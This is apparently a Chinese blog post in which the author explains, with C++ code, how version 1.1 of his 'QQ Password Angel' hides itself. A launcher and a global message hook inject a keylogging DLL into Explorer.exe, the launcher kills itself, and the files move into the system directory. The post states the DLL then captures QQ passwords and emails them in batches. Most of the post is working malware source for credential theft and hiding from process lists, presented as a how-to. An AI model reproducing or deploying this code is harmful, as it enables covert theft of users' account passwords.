戏说"QQ密码天使V1.1"进程的隐藏技术

如果你看了我的<密码天使1.0开发手记>，那么对我的开发思路应该有一个印象了~~但是这个程序有一个问题：它只能在wind9x下实现伪隐藏！何谓伪隐藏？嘻嘻~~就是伪装成服务进程，在进程列表中是看不到的！用RegisterSerivceProcess 函数将进程注册为服务模式就 OK了，不过，要是用进程查看工具，那可原形毕露呀！~~网上很多文章谈到远进程写入技术，这确实是一种高深度隐藏方法，不过，我的程序中没有用到，因为远进程技术在9x下无效，考虑到这个问题，我采用了另一种方法。

在正式涉及到代码之前，我们先看看一些条件！

首先我们要明白这样一个实事：如何进入一个进程内存空间？也就是说怎么让具有执行任务的函数进入另一个程序呢？最规范的方法是系统级的Hook（钩子）功能！如果钩子存在动态库中，那威力就大增，可以干涉其它进程的正常工作！

其次，内存映射！通过映射的空间，我们可以在不同进程中共享空间中的数据，并当作自身进程空间的一部分。我没有用共享数据段，因为在多个DLL与EXE中，数据要一致，我认为内存映射方便一些！

现在我来说说程序的构成，程序共有三个工程文件：WinExe.exe、Install.dll、GetKey.dll。

         1. WinExe.exe运行后加载Install.dll。

      2. Install.dll中有一个辅助函数，实现将GetKey.dll注入到进它进程中去，本程序是注入到Explorer.exe中。此时的GetKey.dll就可在Explorer.exe的掩护下为所欲为了J！（设置钩子、捕获按键、发送邮件）是不是有点象木马了？当然，程序还有一些小细节，能让WinExe.exe和Install.dll在内存中消失，而你同时按下[Ctrl+Alt+Delete]组合键是查不到的WinExe.exe这个进程的，如果你用进程查看器，倒是可以看到GetKey.dll已经成为Exeplorer.exe进程中的一部分了，合合~~！

也许，你会问：为什么不直接用WinExe将GetKey注入到其它进程中呢？？

这是行不通的，因为WinExe与Exepore.exe属于不同进程，它们在通常情况是不能相互访问的！于是我用了一个中介工具（Install.dll）将GetKey.dll注入到Exepore.exe中。是不是有点象火箭载飞船进入太空考查？哈哈，我瞎说罢！ 
  我现在用插图来说明一下：
    

   
                      图 一

程序主体思想就是这样，现在我们按照图示进入代码！记住：我们的最终目标是进入Explorer中~~
   首先我们在要系统快照中找到我们要注入的进程(如果没有，注到哪里去呀，嘻嘻)下面的代码是通过快照找到Exeplorer.exe的进程ID（你可以选其它对象）

在WindExe中我们主要是得到以下三个数据：一个是目标进程，一个是WinExe.exe的句柄，还有一个是当前的WinExe所处的路径。句柄有什么作用？嘻嘻~~~也许有人会说，WinExe的句柄到别的进程就无意义了，不过， 别忘记我介绍过的内存映射，它的出现，情况就不一样了！至于得到一个路径有什么用呢？很简单，无论程序在什么地方运行，它的归宿只一个，那就是转移到系统目录下！记住这个路径是为它自杀作准备的！啊！还有自杀呀！嘻嘻~~那确实~！

WORD CWinExeDlg::FindProcessId()

{

    DWORD  dwID;

    HANDLE m_handle = ::CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);

    PROCESSENTRY32* Info = new PROCESSENTRY32;

    Info->dwSize = sizeof(PROCESSENTRY32);

    BOOL bFind = Process32First(m_handle, Info);

    while (bFind)

    {

        CString strBigWrite;

        strBigWrite = Info->szExeFile;

        strBigWrite.MakeUpper();

        if (strBigWrite.Find("EXPLORER.EXE") != -1)

        {  

            dwID = Info->th32ProcessID;

            bFind = FALSE;

            break;

        }

        bFind = Process32Next(m_handle, Info);     

    }  

    delete Info;

    Info = NULL;

    CloseHandle(m_handle);

    return dwID;

}

    路径和句柄很容易得到,将这三个信息传入Install.dll！ Install.dll就是一个加工厂，将送来的原村料加工！

在进入Install.dll之前，我们先看看工厂有些什么设备？！J

    以下这个结构和共享数据段是一回事！不过，我这个共享数据是一个结构体变量，准备让它记录共享的信息！

 

typedef struct _installinfo

{  

    char  m_cPath[256];//　路径

    DWORD m_dwExplorerId;//J还用说吗？

    DWORD m_dwGetKeyThreadId;// 看看CreateThread后一个参数  

HWND  m_hwnd;// 记录WinExe的句柄

 

}InstallShareData;

 

  看了设备后我们是不是要看看如何加工原料的吧？先将原材料放入到设备中（与上面的结构一一对应）

void InstallInfo(char cPath[], HWND hWnd, DWORD dwPrId)

{

//  memset((InstallShareData*)lpInMem, 0, sizeof(InstallShareData));

    pInShare->m_dwExplorerId = dwPrId;

    pInShare->m_hwnd = hWnd;

    pInShare->m_dwGetKeyThreadId = 0;

    strcpy(pInShare->m_cPath, cPath);

    if (hInHookMsg == NULL)

        hInHookMsg = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hInstance, NULL);

}

    呵呵，看到了吗？我用了钩子！这个钩子的作用是：当GetMessage在队列中找到消息后，它就开始处理消息了！我们看看这个钩子做了一些什么手脚，让GetKey是如何注入Exeplore.exe的？

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)

{

    if (nCode >= 0  )

    {  

        if ( pInShare->m_dwExplorerId != 0 && 
             GetCurrentProcessId() == pInShare->m_dwExplorerId)

        {  

            pInShare->m_dwExplorerId = 0; // 不再需要监视explorer进程了

            CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)OperateThreadpro,
                         NULL,0, &(pInShare->m_dwGetKeyThreadId));

        }

    }

    return CallNextHookEx(hInHookMsg , nCode, wParam, lParam);

}

 

有人说GetCurrentProcessId()打死都不等于pInShare->m_dwExploerId，呵呵，还何况要pInShare->m_dwExploreId 不为零！要是从常理上讲，确实如此！因为你当前的GetCurrentProcessId()得到的是WinExe的进程ID呀，怎么可能和ExPlorer的进程ID相等呢？在这里我曾用调试过,将比较结果输入到文件中,确实不相等！但是当你将内存映射的地址初化一下，也就是在DLL库的入口处（DllMain中）将映射空间的首地址赋予给结构体变量，sigh~~~~~~什么呀？说白了就是把内存映射的句柄强制转换成结构体变量！嘻嘻~~这样一来，它们就有相等的可能了！不过呢，此时GetCurretnProcessId()得到的不是WinExe的ID了，已进入到Explorer的地址空间了！

    看官注意：我们看看CreateThread函数，执行它的后果是什么呢？呵呵~~创建了一新的线程于Exeplorer中罢！那好，我们将目光锁定在OperateThreadpro这个全局线程函数中去！看看它又做了些什么手脚！！！！

void  OperateThreadpro(LPVOID pParam)

{

   typedef void (WINAPI * FUN)(void);

    HMODULE hmodule;

    FUN InstallGetKey;

    char cSysPath[256];

    ::GetSystemDirectory(cSysPath, 256);

    strcat(cSysPath, "//GetKey.dll");

    hmodule = LoadLibrary(cSysPath);//　系统目录

    InstallGetKey = (FUN)GetProcAddress(hmodule, "InstallGetKey");

    if (InstallGetKey != NULL)

    {   

       InstallGetKey(); // 当前线程是不是结束，请看它里面

    }

    else // 这种情况，很少发生!

      {

         FreeLibrary(hmodule);

         return ;

      }
}

   嘻嘻，怎么样，看到了吗？一个关键的地方是动态调用GetKey.dll，绝吧？！什么呀，你早就会呀，那你浪费时间呀?5555J动态加载dll后，自然就要执行它里面的关键函数：InstallGetKey(),现在我们只关心GetKey.dll，不是吗？原材料已加工成产品了，要买给客户呀！什么？你不卖？现在的社会象你这样的人太少了哟！L（留下你的电话吧~~我要作专访~~

   看好，这个InstallGetKey()是一个导出函数，要不然在上面的线程中就有未定义的错误！
　 在GetKey.dll中也有一个结构如下：

typedef struct _installinfo

{   

     char  m_cPath[256];

     DWORD m_dwExplorerId;

     DWORD m_dwGetKeyThreadId;

     HWND  m_hwnd;

 

}INSTALLSHAREDATA;

 

    搞什么鬼呀？和前面的定义的结构是一样的呀？！要数据共享你就不要吝啬多写几下，给它赋一个初值吧？呵呵，是不是WinExe的句柄被映射到这里来了？！怎么一回事呀，你从EXE中取得路径呀什么的你不用呀？不急，不急，看后面撒！J

　　我把这个函数帖出来！这么长，好烦燥的呢,呵呵！！

 

void InstallGetKey()

{

   HANDLE h = OpenFileMapping(FILE_MAP_WRITE | FILE_MAP_READ,
                             false, _T("MemNameInstall"));

  if (h != 0)

  {

    LPVOID p = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);

    p_data = (INSTALLSHAREDATA*)p;     

    if ( p != NULL)

    {

        ::PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1);   // 给exe发送自杀命令

        Sleep(100);//等待100毫秒，这是好关键的！exe自杀也要一点时间嘛^_^
      UnmapViewOfFile(p);

        // exe进程结束后，将install.dll、exe一并复制到系统目录下
       //然后将当前目录下的文件Del掉！

        char cSExePath[256]; // 源exe路径

        char cSDllPath[256]; // 源install路径

        char cDExePath[256]; // 目的exe路径

        char cDDllPath[256]; // 目的dll路径

   

        strcpy(cSExePath, p_data->m_cPath);// 当前目录

        strcpy(cSDllPath, p_data->m_cPath);    

       

        strcat(cSExePath, "//WinExe.exe");// 带文件名           

        strcat(cSDllPath, "//Install.dll");

       

        ::GetSystemDirectory(cDExePath, 256);// 系统目录

        ::GetSystemDirectory(cDDllPath, 256);

       

        strcat(cDExePath, "//WinExe.exe");

        strcat(cDDllPath, "//Install.dll");

 

        if (strcmp(cDExePath, cSExePath) != 0)

        {  

            CopyFile(cSExePath, cDExePath, FALSE);

            if(!::DeleteFile(cSExePath))

            { 

                ofstream fs;

                fs.open("d://_ERROR_1.txt", ios::app);

                fs <<"出错码 = " << GetLastError() << endl;

                fs.close();

            }

        }

        if (strcmp(cDDllPath, cSDllPath) != 0)

        {

 

             CopyFile(cSDllPath, cDDllPath, FALSE);

             if(!::DeleteFile(cSDllPath))

             {

               ofstream fd;

               fd.open("d://_ERROR_2.txt", ios::app);

               fd << "出错码 = " << GetLastError() << endl;

               fd.close();

             }

        }

    }

    CloseHandle(h);

   }

   MSG msg;

   SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc);

   while (GetMessage(&msg, NULL, 0, 0))

   {

      TranslateMessage(&msg);

      DispatchMessage(&msg);

   } 

     // ExitThread(0);// 退出线程
//(要是真退出了，要记得关闭钩子)

}

  

   怎么样？这个函数功能还是不复杂吧！呵呵！我都做了详细的注释，相信你也看得懂！

我简单的说几点：
1.PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1)这个就是发消息让WinExe自杀的!WinExe收到WM＿GOOKLOOK后，证明注入已完成，WinExe留着没有作用了，没有作用就得死，好残酷哦！

2. SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc),发出Timer事件，监视工作开始了，这个和1.0版本大同小异了！

3.不要忘记了，这个函数工作在一个辅助线程函数中，线程函数结束有二种情况:一种情况是自我结束，这种情属于安全结束；还有一种情况是进程结束，它必须无条件结束！在这里，我们不能让它结束，我用了一消息循环，让循环持续它的生命！当然如果要结束它，你可以定义一个全局变量，要定义在内存映射的结构中，在Install.dll中加载GetKey.dll时只要检查这个值，通过这个值你就可以判断线程是不是还没有结束，要是没有结束，你又想结束它，那就发一消息呀，不过，发这个消息要有点艺术，得用系统广播：

  SendMessage(HWND_BROADCAST, WM_YOURDEFINE,0,0)在上面的消息循环中加一判断就OK了！

      至此，程序已告已段落！剩下的部分和1.0版本中的处理一样：设置钩子－＞找QQ窗口－＞捕获铵键－＞记录密码－＞累计五个号码 发送一次！

   要是看出什么破绽，请告诉我！^_^